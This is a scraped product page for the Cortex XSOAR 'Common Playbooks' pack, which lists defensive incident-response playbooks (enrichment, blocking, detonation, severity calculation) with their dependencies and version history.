Determines if a critical assest is associated with the invesigation. The playbook returns a severity level of "Critical" if at least one critical asset is associated with the investigation.
Critical assets refer to: users, user groups, endpoints and endpoint groups.
Common Playbooks
- Details
- Content
- Dependencies
- Version History
Frequently used playbooks pack.
Name | Description |
---|---|
Calculate Severity - Critical Assets v2 | |
Get File Sample From Path - Generic | Deprecated. Use inputs:
|
Get endpoint details - Generic | Deprecated. Use the
|
Detonate and Analyze File - Generic | This playbook uploads, detonates, and analyzes files for supported sandboxes. Currently supported sandboxes are Falcon Intelligence Sandbox, JoeSecurity, and Wildfire. |
Send Investigation Summary Reports | This playbook iterates over closed incidents, generates a summary report for each closed incident, and emails the reports to specified users. |
Block Indicators - Generic v2 | Deprecated. Use the
|
DBot Indicator Enrichment - Generic | Get indicators internal Dbot score |
Account Enrichment - Generic v2.1 | Enrich accounts using one or more integrations.
Also, the playbook supports the generic command 'iam-get-user' (implemented in IAM integrations). For more information, visit https://xsoar.pan.dev/docs/integrations/iam-integrations. |
Calculate Severity - Generic v2 | Calculate and assign the incident severity based on the highest returned severity level from the following calculations:
|
Field Polling - Generic | This playbook polls a field to check if a specific value exists. |
Cloud Enrichment - Generic | Generic Cloud Enrichment PlaybookThe Cloud Enrichment - Generic Playbook is designed to unify all the relevant playbooks concerning the enrichment of information in the cloud. It provides a standardized approach to enriching information in cloud environments. Supported Blocks
The playbook supports a single CSP enrichment at a time. |
Block Account - Generic | Deprecated. Use 'Block Account - Generic v2' instead. This playbook blocks malicious usernames using all integrations that you have enabled. Supported integrations for this playbook:
|
Block IP - Generic v2 | Deprecated. Use the Supported integrations for this playbook:
|
Email Headers Check - Generic | This playbook executes one sub-playbook and one automation to check the email headers:
|
Get User Devices by Username - Generic | This playbook retrieves information on all of the associated user devices, based on the user's username.
Note that not all of the supported integrations will be able to retrieve this information. Supported integrations:
|
Detonate File - Generic | Detonate files through one or more active integrations that support file detonation.
|
Cloud Compute Enrichment - Generic | This playbook provides a generic enrichment of AWS, GCP, and Azure compute resources. |
SIEM - Search for Failed logins | This playbook searches for failed logon on a specific user by querying logs from different sources. Supported Integrations: |
Block IP - Generic v3 | This playbook blocks malicious IP addresses using all integrations that are enabled. The direction of the traffic that will be blocked is determined by the XSOAR user (and set by default to outgoing)
Supported integrations for this playbook [Network security products such as FW/WAF/IPs/etc.]:
|
Get Cloud Account Owner - Generic | Retrieves the owners of a cloud account based on account ID.
|
Convert file hash to corresponding hashes | The playbook enables you to get all of the corresponding file hashes for a file even if there is only one hash type available. |
Command-Line Analysis | This playbook takes a command line from the alert and performs the following actions:
At the end of the playbook, it sets a possible verdict for the command line, based on the finding:
Note: To run this playbook with a list of command lines, set this playbook to run in a loop. To do so, navigate to 'Loop' and check "For Each Input". |
User Investigation - Generic | This playbook performs an investigation on a specific user, using queries and logs from SIEM, Identity management systems, XDR, and firewalls. Supported Integrations: |
Get File Sample From Path - Generic V2 | Deprecated. Use |
Block Indicators - Generic v3 | This playbook blocks malicious indicators using all integrations that are enabled, using the following sub-playbooks:
|
Block Email - Generic | Deprecated. Use 'Block Email - Generic v2' instead. This playbook will block emails at your mail relay integration. |
Block Email - Generic v2 | This playbook will block emails at your mail relay integration. Supported integrations for this playbook:
|
IP Enrichment - External - Generic v2 | Enrich IP addresses using one or more integrations.
|
Cloud IAM Enrichment - Generic | This playbook is responsible for collecting and enriching data on Identity Access Management (IAM) in cloud environments (AWS, Azure, and GCP). |
Get User Devices by Email Address - Generic | This playbook retrieves information on all of the associated user devices, based on the user email.
Note that not all of the supported integrations will be able to retrieve this information. Supported integrations:
|
Send Investigation Summary Reports Job | You should run this playbook as a scheduled job, whicn should run at an interval of once every 15 minutes. This playbook functions by calling the sub-playbook: "Send Investigation Summary Reports", and closes the incident. By default, the playbook will search all incidents closed within the last hour. If you want to run the playbook more frequently, you should adjust the search query of the child playbook: "Send Investigation Summary". Reports. |
Endpoint Enrichment - Generic v2.1 | Enrich an endpoint by hostname using one or more integrations.
|
Block File - Generic v2 | This playbook is used to block files from running on endpoints.
|
Dedup - Generic v3 | Deprecated. Use the
|
Calculate Severity - 3rd-party integrations | Calculates the incident severity level according to the methodology of a 3rd-party integration. |
Cloud Credentials Rotation - Generic | Cloud Credentials Rotation - GenericThis comprehensive playbook combines the remediation steps from AWS, Azure, and GCP sub-playbooks into a single, cohesive guide. Regardless of which Cloud Service Provider (CSP) you're working with, this playbook will direct you to the relevant steps, ensuring swift and effective response. The primary objective is to offer an efficient way to address compromised credentials across different cloud platforms. By consolidating the key steps from AWS, Azure, and GCP, it minimizes the time spent searching for platform-specific procedures and accelerates the remediation process, ensuring the highest level of security for your cloud environments. Integrations for Each Sub-PlaybookIn order to seamlessly execute the actions mentioned in each sub-playbook, specific integrations are essential. These integrations facilitate the automated tasks and processes that the playbook carries out. Here are the required integrations for each sub-playbook: AWS Sub-Playbook:
GCP Sub-Playbook:
Azure Sub-Playbook:
|
Isolate Endpoint - Generic | Deprecated. Use the "Isolate Endpoint - Generic V2" playbook instead. |
Calculate Severity - Standard | Calculates and sets the incident severity based on the combination of the current incident severity, and the severity returned from the Calculate Severity By Highest DBotScore playbook. |
Cloud User Investigation - Generic | This playbook performs an investigation on a specific user in cloud environments, using queries and logs from Azure Log Analytics, AWS CloudTrail, G Suite Auditor, and GCP Logging. |
Entity Enrichment - Generic v2 | Enrich entities using one or more integrations |
Retrieve File from Endpoint - Generic V3 | 'This playbook retrieves a file sample from an endpoint using the following playbooks:'
|
Get File Sample - Generic | Retrieves files from endpoints by the file hash or the file path. |
Search Endpoints By Hash - Generic V2 | Hunt using available tools |
Isolate Endpoint - Generic V2 | This playbook isolates a given endpoint using various endpoint product integrations. |
Get File Sample From Path - Generic V3 | This playbook returns a file sample from a specified path and host that you input in the following playbooks:
|
Unisolate Endpoint - Generic | This playbook unisolates endpoints according to the endpoint ID or host name provided in the playbook.
|
Search Endpoint by CVE - Generic | Hunt for assets with a given CVE using available tools |
Block Domain - Generic v2 | This playbook blocks malicious Domains using all integrations that are enabled. Supported integrations for this playbook:
|
Get File Sample By Hash - Generic v3 | This playbook returns a file sample correlating to a hash in the War Room using the following sub-playbooks:
|
Get File Sample By Hash - Generic v2 | Deprecated. Use
|
Retrieve File from Endpoint - Generic | Deprecated. Use
|
Entity Enrichment - Generic v3 | Enrich entities using one or more integrations. |
GenericPolling | Use this playbook as a sub-playbook to block execution of the master playbook until a remote action is complete.
|
Get Email From Email Gateway - Generic | This playbook retrieves a specified EML/MSG file directly from the email security gateway product. |
Search For Hash In Sandbox - Generic | This playbook searches for a specific hash in the supported sandboxes. If the hash is known, the playbook provides a detailed analysis of the sandbox report. Currently, supported sandboxes are Falcon Intelligence Sandbox, Wildfire and Joe Sandbox. |
Unzip File | This playbook checks whether a file has an extension that supports unzipping, and unzips the file. |
Search And Delete Emails - Generic v2 | This playbook searches and deletes emails with similar attributes of a malicious email using one of the following integrations: * EWS * Office 365 * Gmail * Agari Phishing Defense |
Domain Enrichment - Generic v2 | Enrich domains using one or more integrations.
|
Dedup - Generic v4 | This playbook identifies duplicate incidents using the Cortex XSOAR machine learning method (script). Note: To identify similar incidents you must properly define the playbook inputs. |
IP Enrichment - Internal - Generic v2 | Enrich Internal IP addresses using one or more integrations.
|
Block Domain - Generic | Deprecated. Use 'Block Domain - Generic v2' instead. This playbook blocks malicious Domains using all integrations that are enabled. Supported integrations for this playbook:
|
File Enrichment - File reputation | Get file reputation using one or more integrations |
Calculate Severity By Highest DBotScore | Calculates the incident severity level according to the highest DBotScore. |
Block Account - Generic v2 | This playbook blocks malicious usernames using all integrations that you have enabled. Supported integrations for this playbook:
|
Detonate URL - Generic v1.5 | Detonate URL through one or more active integrations that support URL detonation.
|
Search And Block Software - Generic | This playbook will search a file or process activity of a software by a given image file name. The analyst can then choose the files to block.
|
Block URL - Generic v2 | This playbook blocks malicious URLs using all integrations that are enabled. Supported integrations for this playbook:
|
Search And Delete Emails - Generic | Deprecated. Use |
Detonate URL - Generic | Deprecated. Use Detonate URL - Generic v1.5 playbook instead. Detonate URL through active integrations that support URL detonation. |
Search and Compare Process Executions - Generic | This playbook is a generic playbook that receives a process name and a command-line argument. It searches for the given process executions and compares the command-line argument from the results to the command-line argument received from the playbook input. The playbook supports searching process executions using the following integrations:
Note: Under the "Processes" input, the playbook should receive an array that contains the following keys:
|
File Enrichment - Generic v2 | Enrich a file using one or more integrations.
|
Get Original Email - Generic | Deprecated. Use the "Get Original Email - Generic v2" playbook under the "Phishing" pack instead. |
Calculate Severity - Indicators DBotScore | Calculates the incident severity level according to the highest indicator DBotScore. |
Email Address Enrichment - Generic v2.1 | Enrich email addresses.
|
URL Enrichment - Generic v2 | Enrich URLs using one or more integrations. URL enrichment includes:
|
IP Enrichment - Generic v2 | Enrich IP addresses using one or more integrations.
When executing this playbook through IP Enrichment - Generic v2, IP classification and resolution will be handled by the main playbook, improving performance. |
Extract Indicators From File - Generic v2 | This playbook extracts indicators from a file.
|
Indicator Registration Polling - Generic | This playbook polls all indicators to check if they exist. |
Threat Hunting - Generic | This playbook enables threat hunting for IOCs in your enterprise. It currently supports the following integrations:
|
Cloud Response - Generic | This playbook provides response playbooks for:
The response actions available are:
|
Context Polling - Generic | This playbook polls a context key to check if a specific value exists. |
Wait Until Datetime | Pauses execution until the date and time that was specified in the plabyook input is reached. |
Get host forensics - Generic | This playbook retrieves forensics from hosts for the following integrations:
|
Retrieve File from Endpoint - Generic V2 | Deprecated. Use
|
Get User Devices - Generic | This playbook retrieves information on all of the associated user devices.
Note that not all of the supported integrations will be able to retrieve this information. In order to get the full list of supported integrations, read the following sub-playbooks descriptions:
|
Block URL - Generic | Deprecated. Use 'Block URL - Generic v2' instead. |
CVE Enrichment - Generic v2 | This playbook performs CVE Enrichment using the following integrations:
|
Dedup - Generic v2 | Deprecated. Use the Dedup Generic v3 playbook instead. This playbook identifies duplicate incidents using one of the supported methods. |
Name | Description |
---|---|
IP Enrichment - Internal - Generic v2 | Enrich Internal IP addresses using one or more integrations.
|
Block Domain - Generic | Deprecated. Use 'Block Domain - Generic v2' instead. This playbook blocks malicious Domains using all integrations that are enabled. Supported integrations for this playbook:
|
Indicator Registration Polling - Generic | This playbook polls all indicators to check if they exist. |
Endpoint Investigation Plan | This playbook handles all the endpoint investigation actions by performing the following tasks on every alert associated with the alert:
Note: The playbook inputs enable manipulating the execution flow; read the input descriptions for details. |
Block Indicators - Generic v3 | This playbook blocks malicious indicators using all integrations that are enabled, using the following sub-playbooks:
|
Dedup - Generic v4 | This playbook identifies duplicate alerts using the Cortex XSIAM machine learning method (script). Note: To identify similar alerts you must properly define the playbook inputs. |
Field Polling - Generic | This playbook polls a field to check if a specific value exists. |
Context Polling - Generic | This playbook polls a context key to check if a specific value exists. |
Eradication Plan - Reset Password | This playbook is one of the sub-playbooks in the eradication plan. |
Search and Compare Process Executions - Generic | This playbook is a generic playbook that receives a process name and a command-line argument. It searches for the given process executions and compares the command-line argument from the results to the command-line argument received from the playbook input. The playbook supports searching process executions using the following integrations:
Note: Under the "Processes" input, the playbook should receive an array that contains the following keys:
|
URL Enrichment - Generic v2 | Enrich URLs using one or more integrations. URL enrichment includes:
|
Calculate Severity - Indicators DBotScore | Calculates the alert severity level according to the highest indicator DBotScore. |
Get User Devices - Generic | This playbook retrieves information on all of the associated user devices.
Note that not all of the supported integrations will be able to retrieve this information. In order to get the full list of supported integrations, read the following sub-playbooks descriptions:
|
Command-Line Analysis | This playbook takes a command line from the alert and performs the following actions:
At the end of the playbook, it sets a possible verdict for the command line, based on the finding:
Note: To run this playbook with a list of command lines, set this playbook to run in a loop. To do so, navigate to 'Loop' and check "For Each Input". |
File Enrichment - Generic v2 | Enrich a file using one or more integrations.
|
Convert file hash to corresponding hashes | The playbook enables you to get all of the corresponding file hashes for a file even if there is only one hash type available. |
Cloud Response - Generic | This playbook provides response playbooks for:
The response actions available are:
|
Get Cloud Account Owner - Generic | Retrieves the owners of a cloud account based on account ID.
|
Domain Enrichment - Generic v2 | Enrich domains using one or more integrations.
|
Search Endpoints By Hash - Generic V2 | Hunt using available tools |
Detonate URL - Generic v1.5 | Detonate URL through one or more active integrations that support URL detonation.
|
DBot Indicator Enrichment - Generic | Get indicators internal Dbot score |
Get File Sample From Path - Generic | Deprecated. Use inputs:
|
Containment Plan - Isolate Device | Containment Plan - Isolate DeviceThis playbook is a sub-playbook within the containment plan playbook. |
Unzip File | This playbook checks whether a file has an extension that supports unzipping, and unzips the file. |
Get File Sample From Path - Generic V3 | This playbook returns a file sample from a specified path and host that you input in the following playbooks:
|
Detonate File - Generic | Detonate files through one or more active integrations that support file detonation.
|
Eradication Plan | This playbook handles all the eradication actions available with Cortex XSIAM, including the following sub-playbooks:
Note: The playbook inputs enable manipulating the execution flow. Read the input descriptions for details. |
Search And Delete Emails - Generic v2 | This playbook searches and deletes emails with similar attributes of a malicious email using one of the following integrations: * EWS * Office 365 * Gmail * Agari Phishing Defense |
Block Domain - Generic v2 | This playbook blocks malicious Domains using all integrations that are enabled. Supported integrations for this playbook:
|
Retrieve File from Endpoint - Generic V3 | 'This playbook retrieves a file sample from an endpoint using the following playbooks:'
|
Block Account - Generic | Deprecated. Use 'Block Account - Generic v2' instead. This playbook blocks malicious usernames using all integrations that you have enabled. Supported integrations for this playbook:
|
Get prevalence for IOCs | The playbook queries the analytics module to receive the prevalence of an IOC. Supported IOC:
|
Calculate Severity - 3rd-party integrations | Calculates the alert severity level according to the methodology of a 3rd-party integration. |
Endpoint Enrichment - Generic v2.1 | Enrich an endpoint by hostname using one or more integrations.
|
Cloud Credentials Rotation - Generic | Cloud Credentials Rotation - GenericThis comprehensive playbook combines the remediation steps from AWS, Azure, and GCP sub-playbooks into a single, cohesive guide. Regardless of which Cloud Service Provider (CSP) you're working with, this playbook will direct you to the relevant steps, ensuring swift and effective response. The primary objective is to offer an efficient way to address compromised credentials across different cloud platforms. By consolidating the key steps from AWS, Azure, and GCP, it minimizes the time spent searching for platform-specific procedures and accelerates the remediation process, ensuring the highest level of security for your cloud environments. Integrations for Each Sub-PlaybookIn order to seamlessly execute the actions mentioned in each sub-playbook, specific integrations are essential. These integrations facilitate the automated tasks and processes that the playbook carries out. Here are the required integrations for each sub-playbook: AWS Sub-Playbook:
GCP Sub-Playbook:
Azure Sub-Playbook:
|
Enrichment for Verdict | This playbook checks prior alert closing reasons and performs enrichment and prevalence checks on different IOC types. It then returns the information needed to establish the alert's verdict. |
Block Account - Generic v2 | This playbook blocks malicious usernames using all integrations that you have enabled. Supported integrations for this playbook:
|
Retrieve File from Endpoint - Generic | Deprecated. Use
|
Containment Plan | This playbook handles the main containment actions available with Cortex XSIAM, including the following sub-playbooks:
Note: The playbook inputs enable manipulating the execution flow. Read the input descriptions for details. |
Wait Until Datetime | Pauses execution until the date and time that was specified in the plabyook input is reached. |
Get host forensics - Generic | This playbook retrieves forensics from hosts for the following integrations:
|
Cloud Compute Enrichment - Generic | This playbook provides a generic enrichment of AWS, GCP, and Azure compute resources. |
Email Headers Check - Generic | This playbook executes one sub-playbook and one automation to check the email headers:
|
Block IP - Generic v2 | Deprecated. Use the Supported integrations for this playbook:
|
Block Indicators - Generic v2 | Deprecated. Use the
|
Get endpoint details - Generic | Deprecated. Use the
|
Get Email From Email Gateway - Generic | This playbook retrieves a specified EML/MSG file directly from the email security gateway product. |
IP Enrichment - External - Generic v2 | Enrich IP addresses using one or more integrations.
|
File Reputation | This playbook checks the file reputation and sets the verdict as a new context key. The verdict is composed by 3 main components:
Note: a user can provide a list of trusted signers of his own using the playbook inputs |
Containment Plan - Block Indicators | Containment Plan - Block IndicatorsThis playbook is a sub-playbook within the containment plan playbook. Indicator BlockingThe playbook block indicators by two methods:
|
Block Email - Generic v2 | This playbook will block emails at your mail relay integration. Supported integrations for this playbook:
|
CVE Enrichment - Generic v2 | This playbook performs CVE Enrichment using the following integrations:
|
SIEM - Search for Failed logins | This playbook searches for failed logon on a specific user by querying logs from different sources. Supported Integrations: |
Containment Plan - Disable Account | Containment Plan - Disable AccountThis playbook is a sub-playbook within the containment plan playbook. |
Get File Sample - Generic | Retrieves files from endpoints by the file hash or the file path. |
GenericPolling | Use this playbook as a sub-playbook to block execution of the master playbook until a remote action is complete.
|
Email Address Enrichment - Generic v2.1 | Enrich email addresses.
|
Recovery Plan | This playbook handles all the recovery actions available with Cortex XSIAM, including the following tasks:
Note: The playbook inputs enable manipulating the execution flow; read the input descriptions for details. |
File Enrichment - File reputation | Get file reputation using one or more integrations |
Containment Plan - Clear User Sessions | Containment Plan - Clear User SessionsThis playbook is a sub-playbook within the containment plan playbook. |
Get File Sample By Hash - Generic v3 | This playbook returns a file sample correlating to a hash in the War Room using the following sub-playbooks:
|
Block File - Generic v2 | This playbook is used to block files from running on endpoints.
|
Search Endpoint by CVE - Generic | Hunt for assets with a given CVE using available tools |
Calculate Severity - Standard | Calculates and sets the alert severity based on the combination of the current alert severity, and the severity returned from the Calculate Severity By Highest DBotScore playbook. |
Account Enrichment - Generic v2.1 | Enrich accounts using one or more integrations.
Also, the playbook supports the generic command 'iam-get-user' (implemented in IAM integrations). For more information, visit https://xsoar.pan.dev/docs/integrations/iam-integrations. |
Block URL - Generic | Deprecated. Use 'Block URL - Generic v2' instead. |
Containment Plan - Quarantine File | Containment Plan - Quarantine FileThis playbook is a sub-playbook within the containment plan playbook. |
Threat Hunting - Generic | This playbook enables threat hunting for IOCs in your enterprise. It currently supports the following integrations:
|
Dedup - Generic v2 | Deprecated. Use the Dedup Generic v3 playbook instead. This playbook identifies duplicate alerts using one of the supported methods. |
Unisolate Endpoint - Generic | This playbook unisolates endpoints according to the endpoint ID or host name provided in the playbook.
|
Isolate Endpoint - Generic V2 | This playbook isolates a given endpoint using various endpoint product integrations. |
Ticket Management - Generic |
|
Cloud IAM Enrichment - Generic | This playbook is responsible for collecting and enriching data on Identity Access Management (IAM) in cloud environments (AWS, Azure, and GCP). |
Detonate URL - Generic | Deprecated. Use Detonate URL - Generic v1.5 playbook instead. Detonate URL through active integrations that support URL detonation. |
Cloud Enrichment - Generic | Generic Cloud Enrichment PlaybookThe Cloud Enrichment - Generic Playbook is designed to unify all the relevant playbooks concerning the enrichment of information in the cloud. It provides a standardized approach to enriching information in cloud environments. Supported Blocks
The playbook supports a single CSP enrichment at a time. |
Entity Enrichment - Generic v2 | Enrich entities using one or more integrations |
Get User Devices by Email Address - Generic | This playbook retrieves information on all of the associated user devices, based on the user email.
Note that not all of the supported integrations will be able to retrieve this information. Supported integrations:
|
Entity Enrichment - Generic v3 | Enrich entities using one or more integrations. |
Get File Sample From Path - Generic V2 | Deprecated. Use |
Search And Block Software - Generic | This playbook will search a file or process activity of a software by a given image file name. The analyst can then choose the files to block.
|
Get File Sample By Hash - Generic v2 | Deprecated. Use
|
Get Original Email - Generic | Deprecated. Use the "Get Original Email - Generic v2" playbook under the "Phishing" pack instead. |
Send Investigation Summary Reports | This playbook iterates over closed alerts, generates a summary report for each closed alert, and emails the reports to specified users. |
Get User Devices by Username - Generic | This playbook retrieves information on all of the associated user devices, based on the user's username.
Note that not all of the supported integrations will be able to retrieve this information. Supported integrations:
|
Calculate Severity - Critical Assets v2 | Determines if a critical assest is associated with the invesigation. The playbook returns a severity level of "Critical" if at least one critical asset is associated with the investigation. |
Extract Indicators From File - Generic v2 | This playbook extracts indicators from a file.
|
User Investigation - Generic | This playbook performs an investigation on a specific user, using queries and logs from SIEM, Identity management systems, XDR, and firewalls. Supported Integrations: |
Eradication Plan - Terminate Process | This playbook is one of the sub-playbooks in the eradication plan. |
Cloud User Investigation - Generic | This playbook performs an investigation on a specific user in cloud environments, using queries and logs from Azure Log Analytics, AWS CloudTrail, G Suite Auditor, and GCP Logging. |
Detonate and Analyze File - Generic | This playbook uploads, detonates, and analyzes files for supported sandboxes. Currently supported sandboxes are Falcon Intelligence Sandbox, JoeSecurity, and Wildfire. |
Handle False Positive Alerts | This playbook handles false positive alerts. |
Calculate Severity - Generic v2 | Calculate and assign the alert severity based on the highest returned severity level from the following calculations:
|
Isolate Endpoint - Generic | Deprecated. Use the "Isolate Endpoint - Generic V2" playbook instead. |
Block IP - Generic v3 | This playbook blocks malicious IP addresses using all integrations that are enabled. The direction of the traffic that will be blocked is determined by the XSOAR user (and set by default to outgoing)
Supported integrations for this playbook [Network security products such as FW/WAF/IPs/etc.]:
|
Calculate Severity By Highest DBotScore | Calculates the alert severity level according to the highest DBotScore. |
Retrieve File from Endpoint - Generic V2 | Deprecated. Use
|
Block Email - Generic | Deprecated. Use 'Block Email - Generic v2' instead. This playbook will block emails at your mail relay integration. |
Dedup - Generic v3 | Deprecated. Use the
|
Block URL - Generic v2 | This playbook blocks malicious URLs using all integrations that are enabled. Supported integrations for this playbook:
|
Eradication Plan - Delete File | This playbook is one of the sub-playbooks in the eradication plan. |
IP Enrichment - Generic v2 | Enrich IP addresses using one or more integrations.
When executing this playbook through IP Enrichment - Generic v2, IP classification and resolution will be handled by the main playbook, improving performance. |
Search And Delete Emails - Generic | Deprecated. Use |
Pack Name | Pack By |
---|---|
Base | By: Cortex XSOAR |
Common Scripts | By: Cortex XSOAR |
Filters And Transformers | By: Cortex XSOAR |
Rasterize | By: Cortex XSOAR |
Pack Name | Pack By |
---|---|
Filters And Transformers | By: Cortex XSOAR |
Rasterize | By: Cortex XSOAR |
Base | By: Cortex XSOAR |
Cortex REST API | By: Cortex XSOAR |
Common Scripts | By: Cortex XSOAR |
Playbooks
Search For Hash In Sandbox - Generic
Fixed an issue where a CrowdStrike report was retrieved only for a single SH256 file instead of for multiple SH256 files.
Extract Indicators From File - Generic v2
Added the ability to extract hyperlinks from Office files (supporting .xlsx,.pptx,.docx).
- 33634
Download
Playbooks
Entity Enrichment - Generic v2
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
IP Enrichment - External - Generic v2
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
IP Enrichment - Internal - Generic v2
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
IP Enrichment - Generic v2
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
Threat Hunting - Generic
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
Entity Enrichment - Generic v3
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
Block IP - Generic v3
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
Block Indicators - Generic v3
Updated the input 'InternalRange' to use the 'PrivateIPs' list.
- 33201
Download
Playbooks
Threat Hunting - Generic
Updated the playbook description.
Command-Line Analysis
Updated the playbook description.
File Enrichment - Generic v2
Updated the playbook description.
Account Enrichment - Generic v2.1
Updated the playbook description.
IP Enrichment - Generic v2
Updated the playbook description.
User Investigation - Generic
Updated the playbook description.
- 32867
Download
Playbooks
Block Email - Generic v2
Removed the command netcraft-report-attack. This command has been deprecated and has reached its end-of-life (EOL) date.
The playbook will use the command netcraft-attack-report instead.
Block URL - Generic v2
Removed the command cisco-email-security-list-entry-add. This command has been deprecated and has reached its end-of-life (EOL) date.
The playbook will use the command cisco-sma-list-entry-append from the integration 'CiscoSMA' instead.
- 33126
Download
Playbooks
Detonate URL - Generic v1.5
- Fixed an issue where Detonate URL - ThreatGrid v2 sub playbook should be skipped when unavailable and the default values of Interval and Timeout inputs was raised.
Command-Line Analysis
- Removed non-required Append transformer in the extractIndicators task.
- Added a "RemoveEmpty" transformer in the "Set original commandline" task.
- 32828
Download
Playbooks
Block Indicators - Generic v3
Fixed the "Set indicators to block" task bug that causing errors.
Detonate URL - Generic v1.5
- Removed the duplicated playbook of the 'Detonate Url - WildFire'.
- Added detonation with JoeSecurity vendor.
- Removed the unnecessary section header of the "Detonate URL - VirusTotal (API v3)".
- Removed the unnecessary condition of Check URL.
- 32333
Download
Playbooks
Calculate Severity By Highest DBotScore
- Changed the inputs of this playbook. If you customized the playbook input to anything other than the DBotScore object, you will need to re-adjust the new inputs. The playbook now accepts a list of unique DBotScore indicators and the maximum score given to an indicator, instead of the full DBotScore object.
- Improved the performance of the playbook and reduced the size of the context.
Calculate Severity - Generic v2
- Changed the inputs of this playbook. If you customized the playbook input to anything other than the DBotScore object, you will need to re-adjust the new inputs. The playbook now accepts a list of unique DBotScore indicators and the maximum score given to an indicator, instead of the full DBotScore object.
- Improved the performance of the playbook and reduced the size of the context.
Calculate Severity - Standard
- Changed the inputs of this playbook. If you customized the playbook input to anything other than the DBotScore object, you will need to re-adjust the new inputs. The playbook now accepts a list of unique DBotScore indicators and the maximum score given to an indicator, instead of the full DBotScore object.
- Improved the performance of the playbook and reduced the size of the context.
- 32144
Download
Playbooks
Extract Indicators From File - Generic v2
- Performance improvements: The playbook no longer saves duplicate files locally, and will use the inputs directly instead. This changes preserves backward-compatibility.
- Added the MaxImagesFromPDF input that defines the maximum number of images to extract from a PDF file. The default value is 10, and is aimed to improve performance improvement for PDF files that contain large numbers of images.
Wait Until Datetime
- Added 'Round' transformer for the 'Sleep' command used in the playbook.
- 31936
Download
Playbooks
Block Indicators - Generic v3
Added a condition to verify if any indicators exist at the beginning of the playbook.
Cloud Response - Generic
Fixed a typo in a playbook input.
New: Get Cloud Account Owner - Generic
New: Retrieves the owners of a cloud account based on account ID.
Current supported platforms:
- GCP
- Prisma Cloud. (Available from Cortex XSOAR 6.10.0).
- 31679
Download
Playbooks
IP Enrichment - Internal - Generic v2
- Added the "ExecutedFromParent" input which, when set to True, will skip common logic and let the parent enrichment playbook execute it instead. The default value is False, which will preserve backward-compatibility for users who are using this playbook directly.
- Added additional missing outputs to the playbook.
IP Enrichment - External - Generic v2
- Added the "ExecutedFromParent" input which, when set to True, will skip common logic and let the parent enrichment playbook execute it instead. The default value is False, which will preserve backward-compatibility for users who are using this playbook directly.
- Fixed an issue where getting reputation for external IPs failed the playbook.
- Added additional missing outputs to the playbook.
IP Enrichment - Generic v2
- Improved playbook performance and reduced incident size significantly.
- Added the "ExecutedFromParent" input which, when set to True, will perform common logic on the parent playbook once, instead of twice in the enrichment sub-playbooks.
- Added additional missing outputs to the playbook.
- 31321
- 31147
Download
Playbooks
Detonate File - Generic
The sub-playbook "Detonate File - CrowdStrike Falcon Intelligence Sandbox" was replaced with a new version "Detonate File - CrowdStrike Falcon Intelligence Sandbox v2".
Detonate URL - Generic v1.5
The sub-playbook "Detonate URL - CrowdStrike Falcon Intelligence Sandbox" was replaced with a new version "Detonate URL - CrowdStrike Falcon Intelligence Sandbox v2".
- 31330
Download
Playbooks
IP Enrichment - Generic v2
- Updated the playbook description.
- Updated the playbook output to include missing sub-playbook outputs.
- Added new playbook inputs, 'extended_data' and 'threat_model_association' to indicate if extended data and enhanced reputation are returned by the 'IP Enrichment - External - Generic v2' sub-playbook.
- Updated the 'ResolveIP' playbook input to use 'False' as the default value.
- Updated the 'InternalRange' playbook input's default value.
- 31183
Download
Playbooks
Endpoint Enrichment - Generic v2.1
- Updated the 'EndpointID' playbook input to use 'Endpoint.ID' as the default value.
- Updated the 'IPAddress' playbook input to use 'Endpoint.IPAddress' as the default value.
- Updated the playbook's task descriptions.
- Updated the playbook output to include missing command outputs.
- 31147
Download
Playbooks
IP Enrichment - External - Generic v2
- Updated the playbook description.
- Added new playbook inputs, 'extended_data' and 'threat_model_association' to indicate if extended data and enhanced reputation are returned by the IP reputation command.
- Updated the playbook output to include missing command outputs.
- Deprecated the 'Threat Crowd' enrichment section.
IP Enrichment - Internal - Generic v2
- Updated the 'InternalRange' playbook input default value.
- Updated the 'ResolveIP' playbook input to use 'True' as the default value.
- Updated the playbook output to include missing command outputs.
- 31114
Download
Playbooks
Dedup - Generic v4
- Added the 'DBotFindSimilarIncidentsByIndicators' context key to the playbook outputs.
- Updated tasks and playbook descriptions.
File Enrichment - Generic v2
- Updated tasks and playbook descriptions.
- Updated the playbook output to include missing sub-playbook and command outputs.
- 31023
Download
Playbooks
Detonate URL - Generic v1.5
- Updated the playbook output to include several missing command outputs for ThreatGrid v2, McAfee Advanced Threat Defense, JoeSecurity, Lastline v2, Polygon, CrowdStrike Falcon Intelligence Sandbox, WildFire, VirusTotal (API v3), VMRay, FireEyeAX, SecneurX Analysis, CrowdStrike Falcon, and OPSWAT Filescan integrations.
- Fixed an issue with playbook outputs listing unnecessary command outputs.
- Updated the playbook description.
- Updated the 'URL' playbook input value.
Cloud User Investigation - Generic
Updated the outputs description.
User Investigation - Generic
- Fixed an issue where Cortex Core was not utilized in the user investigation in XSIAM.
- Fixed an issue where sometimes the username was incorrect in the PAN-OS firewall threat log search.
- Fixed an issue where the username input was causing an error in the "Cortex XDR - Get entity alerts by MITRE tactics" playbook.
- 30874
Download
Playbooks
New: Search and Compare Process Executions - Generic
- New: This playbook is a generic playbook that receives a process name and a command-line argument. It searches for the given process executions and compares the command-line argument from the results to the command-line argument received from the playbook input. The playbook supports searching process executions using the following integrations:
- Cortex XDR XQL Engine
- Cortex XDR IR(Search executions inside XDR alerts)
- Microsoft Defender For Endpoint
Note: Under the "Processes" input, the playbook should receive an array that contains the following keys: - value: process name
- commands: command-line arguments (Available from Cortex XSOAR 6.9.0).
New: Search And Block Software - Generic
- New: This playbook will search a file or process activity of a software by a given image file name. The analyst can then choose the files to block.
The following integrations are supported: - Cortex XDR XQL Engine
- Microsoft Defender For Endpoint (Available from Cortex XSOAR 6.9.0).
- 28853
Download
Playbooks
Get File Sample From Path - Generic V3
Added the AcquiredFile output, which will help to distinguish the existing files from the file that has just been retrieved.
Detonate File - Generic
- Updated the playbook output to include several missing command outputs for SecneurXAnalysis, McAfee Advanced Threat Defense, Lastline, JoeSecurity, Polygon, CrowdStrike Falcon Intelligence Sandbox, and OPSWAT Filescan integrations.
